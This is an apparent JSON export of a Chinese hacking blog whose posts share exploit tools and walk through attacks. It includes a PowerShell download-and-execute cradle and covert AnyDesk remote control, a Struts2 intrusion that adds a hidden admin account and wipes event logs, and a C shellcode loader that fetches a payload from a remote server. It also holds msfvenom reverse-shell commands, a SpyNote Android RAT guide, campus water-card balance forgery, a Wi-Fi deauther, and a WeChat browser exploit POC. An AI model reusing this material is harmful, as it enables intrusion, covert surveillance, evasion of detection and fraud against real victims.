{"meta":{"title":"魔域魂窟","subtitle":"","description":"网络安全","author":"魂笛","url":"http://bo.vuvhz.top","root":"/"},"pages":[],"posts":[{"title":"工具整理","slug":"工具整理","date":"2022-11-30T02:34:26.000Z","updated":"2022-11-30T02:38:31.322Z","comments":true,"path":"2022/11/30/工具整理/","link":"","permalink":"http://bo.vuvhz.top/2022/11/30/%E5%B7%A5%E5%85%B7%E6%95%B4%E7%90%86/","excerpt":"","text":"#thinkphp漏洞检测工具 写文件测试默认写入根目录名为shell.php内容为的php文件,只是证明有漏洞并没有写入shell。 工具只用来验证漏洞,没有自定义命令/代码执行。 本工具只用来授权检测,未经授权的测试严禁使用本工具。 链接:https://pan.baidu.com/s/1VcfsJHAQCIJLevExNx86mA?pwd=dhc1提取码:dhc1 #Log4j2利用工具。#https://github.com/JaneMandy/Log4j2-Exp核心使用:JNDI-Injection-Exploit开发。 使用#修改Exp.py里面的参数,如Path,设置为JDK8的java的绝对路径。(如果默认java是jdk8不用设置)修改Host,如果是DOCKER,设置为能够回连到Exp为止。建议使用VPS。请确保所有端口被攻击机可以连接。确保利用成功请运行expo和靶场环境均为JDK8。如果JDK版本高于1.8.191等,请被攻击方URLCodebase参数为ture。否则攻击失败。 更新#取消掉了原有的Payload. 大家命令执行时避免命令冲突就行了,主要是直接命令行方式传入参数。如果想设置cs等等上线,建议使用长度较短的payload。 我也给大家提供了攻击环境。#Log4j2RCE为本地测试环境demo.jar为vulfocus靶场的环境,注意都需要使用jdk8运行。 #V2.1_Fofa收集工具 gayhub:https://github.com/naozibuhao/fofatools/releases/tag/V2.1 大威天龙v1.3升级到大罗法咒V2.0 变更说明: 1.更名为大罗法咒V2.0 2.项目化查询,对于同一个查询内容放在同一个tab页 3.添加自定义接口 4.鼠标右击表格内容,增加添加此查询条件 5.取消彩蛋(取消打开gayhub,播放大威天龙背景音乐) 6.还是没有导出功能,要导出的话,表格里面全选复制,然后到excel中粘贴即可 后续会在易用性上继续进行升级 #shiro工具 #自动化钓鱼文档生成工具,自带免杀效果 自动化钓鱼文档生成工具,自带免杀效果 地址:https://github.com/lengjibo/OffenSiveCSharp/tree/master/xlsmfishing 目前仅支持xlsm格式,VT上大约爆十个左右。 演示视频:https://www.bilibili.com/video/BV15v41187jw 求star、fork#Apache Solr 漏洞检测利用工具v1.1 https://www.secquan.org/Tools/1071842 Apache Solr 漏洞检测利用工具 更新了一下 主要更新: 1、增加了任意文件读取漏洞 2、修改已知bug 本工具仅供学习交流测试,请勿用于任何非法活动,本人不承担一切相关法律责任 #漏洞利用虚拟机 这东西整起来坑太多,直接发大家一份正好的虚拟机版本 我叫雷锋,虚拟机密码ubuntu 链接:https://pan.baidu.com/s/1KuGB6oOwFTZRwZEVGIZ8GA?pwd=4gtn提取码:4gtn #通达OA综合利用工具 关漏洞POC进行整合, 写成图形化工具. 本工具仅供安全测试人员运用于授权测试, 禁止用于未授权测试, 违者责任自负!!! 
项目地址#https://github.com/xinyu2428/TDOA_RCE/releases #CVE-2021-21972 Vmware vCenter 图形化POC批量扫描工具 下载地址:#https://github.com/admin360bug/GUI-POC-EXP/# var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"Weblogic图形化利用工具","slug":"Weblogic图形化利用工具","date":"2022-11-30T02:14:02.000Z","updated":"2022-11-30T02:14:55.146Z","comments":true,"path":"2022/11/30/Weblogic图形化利用工具/","link":"","permalink":"http://bo.vuvhz.top/2022/11/30/Weblogic%E5%9B%BE%E5%BD%A2%E5%8C%96%E5%88%A9%E7%94%A8%E5%B7%A5%E5%85%B7/","excerpt":"","text":"#Weblogic图形化利用工具Weblogic图形化利用工具#前几天碰到一个weblogic的站发现有的工具只能执行命令不能写webshell,找到个工具集成了各个利用方法,也可以直接写内存马https://github.com/sp4zcmd/WeblogicExploit-GUI","categories":[],"tags":[]},{"title":"anydesk进行远控","slug":"anydesk进行远控","date":"2022-11-29T04:35:03.000Z","updated":"2022-11-29T04:38:01.521Z","comments":true,"path":"2022/11/29/anydesk进行远控/","link":"","permalink":"http://bo.vuvhz.top/2022/11/29/anydesk%E8%BF%9B%E8%A1%8C%E8%BF%9C%E6%8E%A7/","excerpt":"","text":"#anydesk进行远控在进行内网渗透的时候,如果目标机器出网,但是有时候目标3389端口未开放也就表示我们无法使用远程桌面进行连接。但是依然有很多第三方远程控制软件可以帮助我们,例如Teamviewer或者AnyDesk。 本片文章我们将使用Cobalt Strike配合AnyDesk进行演示。 首先上线cs#这里我们使用powershell上线,首先我们使用Payload Generator生成一个ps1脚本 然后在目标机器上执行:(使用管理员权限执行) powershell "$a='IEX(New-Object 
Net.WebClient).Downlo';$b='11(''https://www.xxxx.tk:8443/payload.ps1'')'.Replace('11','adString');IEX ($a+$b)" 可以看到上线成功 下载anydesk#获取到权限以后 ,我们在目标机器上下载anydesk: powershell (New-Object System.Net.WebClient).DownloadFile(“https://download.anydesk.com/AnyDesk.exe","C:\\anydesk.exe") 我们看到anydesk已经下载到了目标主机上,这是我们先不急着打开,我们先添加他的配置文件 #生成配置文件#如果我们直接打开的话,我们不知道他的id号,也不能通过密码进行登录,更不可能直接修改,这时候我们可以先在本机生成一个配置文件,然后将配置文件拷过去。 所以我们先下载一个anydesk到本地,然后打开它,记住他的id号,例如我的就是802691146我们为自主访问设置密码在这里随便设置一个密码 然后我们将anydesk彻底关闭,退出的时候选择不安装anydesk他会自动将配置文件生成在%appdata%\\AnyDesk,也就是C:\\Users\\你的用户名\\AppData\\Roaming\\AnyDesk 我们将这四个文件保存下来,然后上传到目标主机的对应位置,务必记得保存到别处以后把本机的配置文件删除#上传配置文件并启动anydesk#在这个路径下新建一个名为AnyDesk的文件夹 然后在此文件夹下上传刚刚保存的四个配置文件 然后启动anydesk 连接测试,提示输入密码 成功连接 #注意事项#这里说一下避免踩坑的几个点: 记的在这里一定要把用户名称改成自定义,否则在那边直接会显示你的用户名 \\手动狗头 生成配置文件后将配置文件保存后记的删除配置文件,下次你重新启动anydesk的时候会自动生成并自动重新分配一个id目标主机必须有管理员权限必要时可以可以设置代理,避免让对方反制自己(由于我是用的是clash,直接代理的本地7890端口)控制目标机器后可以关闭目标机器的anydesk,但实际不会断开连接,且连接结束后会自动结束目标机器的anydesk进程,便于消除痕迹控制目标机器后记的开启禁止用户输入和启动隐私模式","categories":[],"tags":[]},{"title":"Struts2漏洞","slug":"Struts2漏洞","date":"2022-11-29T04:23:53.000Z","updated":"2022-11-29T04:29:15.245Z","comments":true,"path":"2022/11/29/Struts2漏洞/","link":"","permalink":"http://bo.vuvhz.top/2022/11/29/Struts2%E6%BC%8F%E6%B4%9E/","excerpt":"","text":"#Struts2漏洞实战锁定目标后发现没有注入,也没有xss,也没有远程代码执行于是用检测工具,盲打,打出了Struts2,于是开始漏洞利用1.github上面有Struts2工具,拿到shell,上线冰蝎 2.然后一番周折,我的马直接被它安全管家杀掉,于是又加强了我的马,成功的绕过了安全管家,成功上线 3.查看系统信息 4.运气比较好,直接getsystem 然后建立账号net user hack$ hack /add && net localgroup hack hack$ /add 5.常规操作,想办法获取密码,不知到这是什么情况,于是我懵了,刚刚和安全管家大战2天,今天又碰到了系统问题 密码好像是加密的,哎。我还是太菜了6.然后赶紧删除记录 
系统日志:%SystemRoot%\\System32\\Winevt\\Logs\\System.evtx安全日志:%SystemRoot%\\System32\\Winevt\\Logs\\Security.evtx应用程序日志:%SystemRoot%\\System32\\Winevt\\Logs\\Application.evtx日志在注册表的键:HKEY_LOCAL_MACHINE\\system\\CurrentControlSet\\Services\\Eventlog 开始→运行,输入 eventvwr 进入事件查看器,右边栏选择清除日志。 PowerShell -Command “& {Clear-Eventlog -Log Application,System,Security}” Get-WinEvent -ListLog Application,Setup,Security -Force | % {Wevtutil.exe cl $_.Logname} eventcreate -l system -so administrator -t warning -d “this is a test” -id 500 meterpreter > run event_manager -i meterpreter > run event_manager -c meterpreter > clearev 一顿操作猛如虎,一看技术两条狗 7.3389死活打不开,不知是不是安全管家搞的,于是用通道建立隧道,msf打一下内网 打完ms17-010,无果8.第二天在弄,马连接效果还是好,关机了,还能不断 获取到了hash,但是忘记截图了 aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0我尝试用hash登录,也失败了。。国庆节了,我还是没有破解开,太菜了,呜呜,大佬们可以帮我破解一下吗?小弟十分感谢啊 然后获取截图,使用社区大佬发的远程协助工具漏洞通过修改软件运行后的文档内容,二改成固定的协助码的方式,顺利登录服务器","categories":[],"tags":[]},{"title":"wifi杀手终极版oled显示","slug":"wifi杀手终极版oled显示","date":"2022-11-29T03:53:21.000Z","updated":"2022-11-29T03:54:01.209Z","comments":true,"path":"2022/11/29/wifi杀手终极版oled显示/","link":"","permalink":"http://bo.vuvhz.top/2022/11/29/wifi%E6%9D%80%E6%89%8B%E7%BB%88%E6%9E%81%E7%89%88oled%E6%98%BE%E7%A4%BA/","excerpt":"","text":"#wifi杀手终极版oled显示https://github.com/SpacehuhnTech/esp8266_deauther/releases/tag/2.6.1#感谢spacehuhn开源#某宝240,成本26#测试效果秒杀,但是只支持2.4G频段的#制作方法:一个esp8266,一个oled屏幕,按键oled可以买IIC接口的也可以买SPI接口,SPI接口速度更快因为便宜,所以我选择IIC的 1.固件 https://github.com/SpacehuhnTech/esp8266_deauther/releases/download/2.6.1/esp8266_deauther_2.6.1_DSTIKE_DEAUTHER_OLED_V1_5.bin 2.攻击方式分为: 
(1)Deauth:因为WIFI管理数据帧没有被加密,导致攻击者可以伪造管理帧,从而让攻击者可以任意发送“取消认证”数据包来强行切断AP与客户端的连接(就是无脑洪水堵塞攻击,一直切断对方设备与机器的连接,从而导致对方设备无法正常连接)。 (2)Beacon:信标帧(Beacon)数据包用于宣告接入点,通过不断发送信标帧数据包(说白点就是创建许多新的wifi干扰对方的正常连接),由于目前部分设备自带SSID检测,所以我们使用随机生成SSID以达到目的。 (3)Probe-response:探测请求帧由用户设备发送,以询问一个已知网络是否在附近。通过请求您在SSID列表中指定的网络,以此来混淆WiFi跟踪器。(就是手机给已知WiFi网络发送一个probe-request帧,可提供网络服务的接入点将响应一个probe-response帧,你的手机将会跟这个响应接入点进行连接,所以看起来跟Deauth攻击差不多)。 (4)钓鱼攻击:通过伪造wifi使受害者连接假冒wifi,通过钓鱼页面等一系列手法可以实现监听流量,获取原真实wifi密码等等,在这里不多赘述和展示了。 漏洞产生原因:802.11 WiFi标准包含一种专门针对网络和连接管理的特殊帧类型,查找wifi时,被动监听WiFi热点所广播出来的“beacon”管理帧(用来表明该热点可用),而“probe-request”,你的设备会发送这种管理帧来查看之前连接过的网络当前是否在周围。如果距离内存在已访问过的网络,相应的热点将会用“probe-response”帧予以响应,这些管理帧存在的问题就是,它们完全没有经过任何的加密,这样做的目的是为了增加WiFi的易用性,因为你完全不需要进行任何的密钥交换或密码确认就可以查看到周围的WiFi网络以及热点名称,但这也增加了WiFi网络的攻击面:任何设备都可以给任何网络发送beacon帧和probe-response帧。 防御措施: 1.将进行wifi攻击的抓到打一顿,一顿不行就继续打(开个玩笑)。 2.将路由器设置发射信道使用5Ghz频段。 3.使用网线连接(手动滑稽)。 4.购买有安全防护功能的大牌路由器。 5.目前还没有什么其他更好的措施,等待新协议标准的出现。 实测","categories":[],"tags":[]},{"title":"c语言免杀加载器","slug":"c语言免杀加载器","date":"2022-11-29T03:45:07.000Z","updated":"2022-11-29T03:52:03.609Z","comments":true,"path":"2022/11/29/c语言免杀加载器/","link":"","permalink":"http://bo.vuvhz.top/2022/11/29/c%E8%AF%AD%E8%A8%80%E5%85%8D%E6%9D%80%E5%8A%A0%E8%BD%BD%E5%99%A8/","excerpt":"","text":"#c语言免杀加载器分享一款加载器分离木马payloads测试效果 生产payloads,二进制的payloads 运行上线 测试代码可以用vs2012~vs2022,需要修改部分代码,vs2019好像不用,我是vs2019 #include "stdafx.h"#include <windows.h>#include <stdlib.h>#include <stdio.h>#include <urlmon.h>#include <string>#include <time.h>using namespace std;#pragma 
comment(linker,"/subsystem:\\"windows\\" /entry:\\"mainCRTStartup\\"")#include <UrlMon.h>#pragma comment(lib,"urlmon.lib")#include <tchar.h>int main(){ Sleep(182); URLDownloadToFile(NULL, _T("http://www.xxxxxx.com/shell.png"), _T("miko.png"), NULL, NULL); Sleep(168); int a; srand((unsigned)time(NULL)); a=rand()%10000+1; FILE *lp; size_t help; unsigned char* shell; Sleep(a); for(int i=0;i<3;i++){a=rand()%10000+1; Sleep(a);} lp=fopen("shell.png","rb"); Sleep(a); fseek(lp,0,SEEK_END); help=ftell(lp); fseek(lp,0,SEEK_SET); shell=(unsigned char*)malloc(help); Sleep(200); fread(shell,help,1,lp); void* exec=VirtualAlloc(0,help,MEM_COMMIT,PAGE_EXECUTE_READWRITE); memcpy(exec,shell,help); ((void(*) ())exec)(); return 0;} 前面的代码生成二进制的图片png,然后把图片放到服务器http://xxxxxx.top/miko.png,然后运行木马,木马会把payload下载到电脑然后执行,二是把图片传到本文件夹在运行这个exe加载器实现加载payload,在没有网的时候把图片放到这个里面,在有网的时候可以让他自己下载然后执行。 #方式二1.msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102 -e x86/shikata_ga_nai -i 11 -f py -o mo.py 2.msfvenom -p windows/meterpreter/reverse_tcp LHOST=vuvhz.top LPORT=8888 -e x86/shikata_ga_nai -i 11 –platform windows PrependMigrate=true PrependMigrateProc=svchost.exe -f py -o mo.py自动迁移进程到svchost.exe 3.msfvenom -p windows/meterpreter/reverse_tcp LHOST=vuvhz.top LPORT=443 -e x86/shikata_ga_nai -i 11 –platform windows PrependMigrate=true PrependMigrateProc=svchost.exe PayloadUUIDTracking=true HandlerSSLCert=/home/kali/Desktop/bd/www.baidu.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f py -o mo.py证书加自动迁移进程到svchost.exe #手机远控无后门版 资源分享 · mikoxihua · 于3年前创建 · 共 281 次阅读https://pan.baidu.com/s/1YeriXnaVpPp90AQJAr9QsA 8m3g 实测可持久,可开机自启,可隐藏#封装windows系统#对于一些需要多次装机的系统进行iso封装,可以减少不必要的麻烦,封装系统环境加所有工具,安装即用#之前用于封装系统,网上找了好多没弄理想,于是在淘宝买了这工具链接:https://pan.baidu.com/s/1IuHJnQPUhM6ZJIx3-ONjVg提取码:secq复制这段内容后打开百度网盘手机App,操作更方便哦 #445检测批量工具下载链接https://pan.baidu.com/s/1-Vgxa13ebY4AyHWyL0nj1gsecq 打开ms17-010批量扫描.bat 更改要扫描的ip段,格式为111.111.%n%.1/24 运行完成后。进入bug文件夹,打开合并bug.bat 然后打开bug.txt 
ctrl+F搜索“成功”。感谢大佬们发的检测工具","categories":[],"tags":[]},{"title":"校园热水卡破解.md","slug":"校园热水卡破解","date":"2022-11-28T00:45:23.000Z","updated":"2022-11-28T00:46:37.253Z","comments":true,"path":"2022/11/28/校园热水卡破解/","link":"","permalink":"http://bo.vuvhz.top/2022/11/28/%E6%A0%A1%E5%9B%AD%E7%83%AD%E6%B0%B4%E5%8D%A1%E7%A0%B4%E8%A7%A3/","excerpt":"","text":"#校园热水卡破解(授权)本测试已经授权#1.需要的工具和设备都不用说了,某宝上可以买到正题#2.测试思路—->查看水卡信息—->找出金额的位置——>然后猜测计算算法—–>写入金额——->白嫖(当然不要违法,校方已经开始想方案了)3.这是没钱时的水卡的信息 4.这是有钱时候的水卡 5.打码的地方是学号和姓名6.发现了刷水前后的变化区域在1扇区,于是开始拿笔计算,没有接触过的我,就查了一下资料,(百度),于是按照大佬的操作测试————————>运气不好,失败告终,无法使用,水卡一直报警参照这个大佬的文章,不行https://www.52pojie.cn/thread-799755-1-1.html7.从以上文章中得出 修改数据(每个学校水卡算法不同,此算法不一定适用你的水卡)现在将金额改成333块钱保留两位小数就是333.00去掉点33300转十六进制得8214,然后倒过来得1482然后搞定校验位1482按位取反得0B7D然后替换原金额F460替换成1482原校验位0B9F替换成0B7D (1)校验位 (2)金额 就这俩,于是拿起笔开始看,果不其然,发现我们的水卡是6个十六进制 404B4C 猜测元,角,分 于是开始计算 然后倒写,然后在求校验位,于是按位取反得00BFB4B3,刚开始写入一行,因为水卡一开始两行的数据不一样,于是我写进去后只写了一行,后来一直响,刷水还无限,于是以为金额问题,就在改,可以还是无果,于是不是金额的问题,于是尝试写两行,看到之前那篇文章的大佬也写了两行,于是写了两行后","categories":[],"tags":[]},{"title":"安卓远控.md","slug":"安卓远控","date":"2022-11-27T08:58:34.000Z","updated":"2022-11-27T09:02:27.272Z","comments":true,"path":"2022/11/27/安卓远控/","link":"","permalink":"http://bo.vuvhz.top/2022/11/27/%E5%AE%89%E5%8D%93%E8%BF%9C%E6%8E%A7/","excerpt":"","text":"#安卓远控 spynote3.2###安卓远控 spynote3.2 简明使用教程在 freebuf看到 ‘当心,安卓远控(spynote)升级了’#遂下来自己琢磨了下 的确是非常强大 隐藏自身 目前还是过查杀的 希望大家都多多动手 然后发心得到社区中来 多多发表自己的学习心得 技术理解等让我们共同建设好 这片属于我们自己的圈子 效果图# 至少要win7以上 必须安装 .net4.5 4.5以下都不可以 java推荐是 jre 8 .net 安装不对的话 会提示 各种错误一些文件夹不存在 java版本低的话会有各种java 的意外停止 2 配置相关# 顺利打开的话 会提示 设置端口 配置木马#点击左上角 tools – bulid 然后 配置上线地址 端口 等 换个图标试试? 上线效果#上线速度很快 功能很强大 链接:https://pan.baidu.com/s/10kGm5xldOv4u-q7KMw4Vew提取码:1111 还有poc整理https://github.com/Phuong39/2022-HW-POC","categories":[],"tags":[]},{"title":"校园网udp53端口破解免认证","slug":"校园网udp53端口破解免认证","date":"2021-10-12T11:02:27.000Z","updated":"2021-10-12T11:08:41.290Z","comments":true,"path":"2021/10/12/校园网udp53端口破解免认证/","link":"","permalink":"http://bo.vuvhz.top/2021/10/12/%E6%A0%A1%E5%9B%AD%E7%BD%91udp53%E7%AB%AF%E5%8F%A3%E7%A0%B4%E8%A7%A3%E5%85%8D%E8%AE%A4%E8%AF%81/","excerpt":"","text":"#校园网udp53端口破解免认证 安装脚本http://iyandi.xyz/wp-content/uploads/2021/10/openvpn-install-master.zip openvpn下载 http://iyandi.xyz/wp-content/uploads/2021/10/win10-2.4.9.zip 自行翻墙下载,或者使用我的###原理:此方法基本全国百分之80校园网可破解,让大家了解下校园网。本教程适用于校园网以及运营商的CMCC,chinanet,unicom。(任何需要web认证的WiFi)目前校园网破解方案: 利用udp 53/67/68/69/161/5353/6868/636/3389/123/1194 端口上网 IPv4免流上网 drcom共享网络 不排除有其他高阶方案,只列出我所了解的,比如刷路由器固件等等 原理简介 
在连接到某个需要Web认证的热点后(已连接但未验证),我们已经获得了一个内网IP,此时如果我们访问某个HTTP网站,网关会对这个HTTP响应报文劫持并纂改,302重定向给我们一个web认证界面。 网关(或者说交换机)都默认放行DHCP(用于分配IP)和DNS(用于劫持用户数据报)。比如DNS用到的端口是udp53,DHCP用到的端口是udp67,68,67是服务器广播回应端口用户报文应该过不去。 破解方法: 在校外服务器搭建代理(op,dns2等),代理协议udp,代理端口 53/67/68/69/161/5353/6868/636/3389/123/1194等等端口 ###正题1.openvpn服务端安装 bash openvpn-install.sh 2.设置ip 3.名字随便写 如上图配置完成 4.名字随便 5.添加用户名 6.复制配置文件到openvpn客户端连接,一定要关闭防火墙,打开53端口 成功突破校园网,不用在办理非常非常贵的宽带了,太黑了,有些学校是其他端口,搭建服务器该端口就可以了","categories":[],"tags":[]},{"title":"MFC社工利器","slug":"MFC社工利器","date":"2021-09-17T13:50:32.000Z","updated":"2021-09-17T13:51:12.701Z","comments":true,"path":"2021/09/17/MFC社工利器/","link":"","permalink":"http://bo.vuvhz.top/2021/09/17/MFC%E7%A4%BE%E5%B7%A5%E5%88%A9%E5%99%A8/","excerpt":"","text":"MFC社工利器就他了,第一个,qq右上角复制qq看点链接# 然后打开我的软件 qq看点到手机号,微博一条龙","categories":[],"tags":[]},{"title":"esp8266+blinker+小爱同学控制4到8个设备源码","slug":"esp8266+blinker的app+小爱同学控制4到8个设备源码","date":"2021-09-17T13:48:28.000Z","updated":"2021-09-17T13:48:29.257Z","comments":true,"path":"2021/09/17/esp8266+blinker的app+小爱同学控制4到8个设备源码/","link":"","permalink":"http://bo.vuvhz.top/2021/09/17/esp8266+blinker%E7%9A%84app+%E5%B0%8F%E7%88%B1%E5%90%8C%E5%AD%A6%E6%8E%A7%E5%88%B64%E5%88%B08%E4%B8%AA%E8%AE%BE%E5%A4%87%E6%BA%90%E7%A0%81/","excerpt":"","text":"esp8266+blinker的app+小爱同学控制4到8个设备源码 #define BLINKER_MIOT_MULTI_OUTLET //设置为小爱多个插座的模式#define BLINKER_PRINT Serial#define BLINKER_PRINT Serial#define BLINKER_WIFI#include <Blinker.h>#define Socket1 D5#define Socket2 D6#define Socket3 D7#define Socket4 D8char auth[] = "***************";/****秘钥****/char ssid[] = "****************"; //wifi名字char pswd[] = "************"; // wifi密码char Port;int Feedback = 0;int OnorOff = 0;long F_time = 0;int count=0;bool WIFI_Status = true;// 新建组件对象BlinkerButton Button1("k1"); //设置blinkerapp内数据键名BlinkerButton Button2("k2");BlinkerButton Button3("k3");BlinkerButton Button4("k4");void smartConfig()//配网函数{ WiFi.mode(WIFI_STA); Serial.println("\\r\\nWait for Smartconfig..."); 
WiFi.beginSmartConfig();//等待手机端发出的用户名与密码 while (1) { Serial.print("."); digitalWrite(LED_BUILTIN, HIGH); delay(1000); digitalWrite(LED_BUILTIN, LOW); delay(1000); if (WiFi.smartConfigDone())//退出等待 { Serial.println("SmartConfig Success"); Serial.printf("SSID:%s\\r\\n", WiFi.SSID().c_str()); Serial.printf("PSW:%s\\r\\n", WiFi.psk().c_str()); break; } }}void WIFI_Set()//{ //Serial.println("\\r\\n正在连接"); while(WiFi.status()!=WL_CONNECTED) { if(WIFI_Status) { Serial.print("."); digitalWrite(LED_BUILTIN, HIGH); delay(500); digitalWrite(LED_BUILTIN, LOW); delay(500); count++; if(count>=5)//5s { WIFI_Status = false; Serial.println("WiFi连接失败,请用手机进行配网"); } } else { smartConfig(); //微信智能配网 } } /* Serial.println("连接成功"); Serial.print("IP:"); Serial.println(WiFi.localIP());*/}void Set_Butt(int num) //on反馈{ if (num == 1) { Button1.print("on"); } else if (num == 2) { Button2.print("on"); } else if (num == 3) { Button3.print("on"); } else if (num == 4) { Button4.print("on"); } }void Reset_Butt(int num) //off反馈{ if (num == 1) { Button1.print("off"); } else if (num == 2) { Button2.print("off"); } else if (num == 3) { Button3.print("off"); } else if (num == 4) { Button4.print("off"); } }void miotPowerState(const String & state, uint8_t num) //小爱控制函数{ BLINKER_LOG("need set outlet: ", num, ", power state: ", state); if (num == 1) { Feedback = 1; Port = Socket1; //指定每一路开关对应在开发板上的通道接口 } else if (num == 2) { Feedback = 2; Port = Socket2; } else if (num == 3) { Feedback = 3; Port = Socket3; } else if (num == 4) { Feedback = 4; Port = Socket4; } if (state == BLINKER_CMD_ON) { OnorOff = 1; if(num == 0) { Feedback = 5; digitalWrite(Socket1, HIGH); digitalWrite(Socket2, HIGH); digitalWrite(Socket3, HIGH); digitalWrite(Socket4, HIGH); } else { digitalWrite(Port, HIGH); } BlinkerMIOT.powerState("on", num); BlinkerMIOT.print(); } else if (state == BLINKER_CMD_OFF) { OnorOff = 2; if(num == 0) { Feedback = 5; digitalWrite(Socket1, LOW); digitalWrite(Socket2, LOW); digitalWrite(Socket3, LOW); 
digitalWrite(Socket4, LOW); } else { digitalWrite(Port, LOW); } BlinkerMIOT.powerState("off", num); BlinkerMIOT.print(); }}void button1_callback(const String & state) //点灯app内控制按键触发{ BLINKER_LOG("get button state: ", state); if (state == "on") { digitalWrite(Socket1, HIGH); Button1.print("on"); } if (state == "off") { digitalWrite(Socket1, LOW); Button1.print("off"); }}void button2_callback(const String & state) //点灯app内控制按键触发{ BLINKER_LOG("get button state: ", state); if (state == "on") { digitalWrite(Socket2, HIGH); Button2.print("on"); } if (state == "off") { digitalWrite(Socket2, LOW); Button2.print("off"); }}void button3_callback(const String & state) //点灯app内控制按键触发{ BLINKER_LOG("get button state: ", state); if (state == "on") { digitalWrite(Socket3, HIGH); Button3.print("on"); } if (state == "off") { digitalWrite(Socket3, LOW); Button3.print("off"); }}void button4_callback(const String & state) //点灯app内控制按键触发{ BLINKER_LOG("get button state: ", state); if (state == "on") { digitalWrite(Socket4, HIGH); Button4.print("on"); } if (state == "off") { digitalWrite(Socket4, LOW); Button4.print("off"); }}void setup() { // 初始化串口 Serial.begin(115200);#if defined(BLINKER_PRINT) BLINKER_DEBUG.stream(BLINKER_PRINT);#endif // 初始化有LED的IO pinMode(Socket1, OUTPUT); digitalWrite(Socket1, LOW); pinMode(Socket2, OUTPUT); digitalWrite(Socket2, LOW); pinMode(Socket3, OUTPUT); digitalWrite(Socket3, LOW); pinMode(Socket4, OUTPUT); digitalWrite(Socket4, LOW);//初始化输出低电平 pinMode(LED_BUILTIN, OUTPUT); WIFI_Set(); // 初始化blinker Blinker.begin(auth, WiFi.SSID().c_str(), WiFi.psk().c_str()); Button1.attach(button1_callback);//注册按键回调函数 Button2.attach(button2_callback); Button3.attach(button3_callback); Button4.attach(button4_callback); BlinkerMIOT.attachPowerState(miotPowerState); // BlinkerMIOT.attachPowerState(miotPowerState); digitalWrite(LED_BUILTIN, HIGH);}int i=0;void loop() { Blinker.run(); if(OnorOff == 0) { } else if(OnorOff == 1)//如果是ON状态 { delay(1500); if(Feedback < 5)//小于5 是单独控制 
1-4 { Set_Butt(Feedback);//反馈1-4 OnorOff = 0; }else if(Feedback == 5)//等于5 是打开所有然后1.2s每个的速度反馈所有 { if(millis() - F_time >=1200) { F_time = millis(); i++; Set_Butt(i); i%=4; if(i == 0) //当所有状态反馈完毕则退出 { Feedback = 0; OnorOff = 0; } } } } else if(OnorOff == 2) { delay(1500); if(Feedback < 5)//小于5 是单独控制 1-4 { Reset_Butt(Feedback);//反馈1-4 OnorOff = 0; }else if(Feedback == 5)//等于5 是 关闭 所有然后1.2s每个的速度反馈所有 { if(millis() - F_time >=1200) { F_time = millis(); i++; Reset_Butt(i); i%=4; if(i == 0) //当所有状态反馈完毕则退出 { Feedback = 0; OnorOff = 0; } } } }}","categories":[],"tags":[]},{"title":"微信3.2.11.151Google内核poc利用上线","slug":"微信3-2-11-151Google内核poc利用上线","date":"2021-09-17T13:08:11.000Z","updated":"2021-09-17T13:08:52.670Z","comments":true,"path":"2021/09/17/微信3-2-11-151Google内核poc利用上线/","link":"","permalink":"http://bo.vuvhz.top/2021/09/17/%E5%BE%AE%E4%BF%A13-2-11-151Google%E5%86%85%E6%A0%B8poc%E5%88%A9%E7%94%A8%E4%B8%8A%E7%BA%BF/","excerpt":"","text":"[转发]微信最新版本3.2.11.151 Google内核poc利用上线cs方式!微信对版本进行了紧急更新,但是忽略了小程序,依旧可执行shellcode!用的小程序上线的微信,最新版的 <web-view src="https://www.baidu.com"> </web-view> 测试页面进行上线测试 最新版本的微信 POC没变这里大佬是index.html 引用js代码: <script src="test.js"></script> poc代码 ENABLE_LOG = true;IN_WORKER = true;// run calc and hang in a loopvar shellcode = 
[0x11,0x00,0x21];//前面是例子shellcode替换成自己的 注意是x86的 生成C语言 shellcode 将\\换成“,0” 全部替换后删除首部“,”!function print(data) {}var not_optimised_out = 0;var target_function = (function (value) { if (value == 0xdecaf0) { not_optimised_out += 1; } not_optimised_out += 1; not_optimised_out |= 0xff; not_optimised_out *= 12;});for (var i = 0; i < 0x10000; ++i) { target_function(i);}var g_array;var tDerivedNCount = 17 * 87481 - 8;var tDerivedNDepth = 19 * 19;function cb(flag) { if (flag == true) { return; } g_array = new Array(0); g_array[0] = 0x1dbabe * 2; return 'c01db33f';}function gc() { for (var i = 0; i < 0x10000; ++i) { new String(); }}function oobAccess() { var this_ = this; this.buffer = null; this.buffer_view = null; this.page_buffer = null; this.page_view = null; this.prevent_opt = []; var kSlotOffset = 0x1f; var kBackingStoreOffset = 0xf; class LeakArrayBuffer extends ArrayBuffer { constructor() { super(0x1000); this.slot = this; } } this.page_buffer = new LeakArrayBuffer(); this.page_view = new DataView(this.page_buffer); new RegExp({ toString: function () { return 'a' } }); cb(true); class DerivedBase extends RegExp { constructor() { super( { toString: cb }, 'g' ); this_.buffer = new ArrayBuffer(0x80); g_array[8] = this_.page_buffer; } } var derived_n = eval(`(function derived_n(i) { if (i == 0) { return DerivedBase; } class DerivedN extends derived_n(i-1) { constructor() { super(); return; ${"this.a=0;".repeat(tDerivedNCount)} } } return DerivedN; })`); gc(); new (derived_n(tDerivedNDepth))(); this.buffer_view = new DataView(this.buffer); this.leakPtr = function (obj) { this.page_buffer.slot = obj; return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt); } this.setPtr = function (addr) { this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt); } this.read32 = function (addr) { this.setPtr(addr); return this.page_view.getUint32(0, true, ...this.prevent_opt); } this.write32 = function (addr, value) { this.setPtr(addr); 
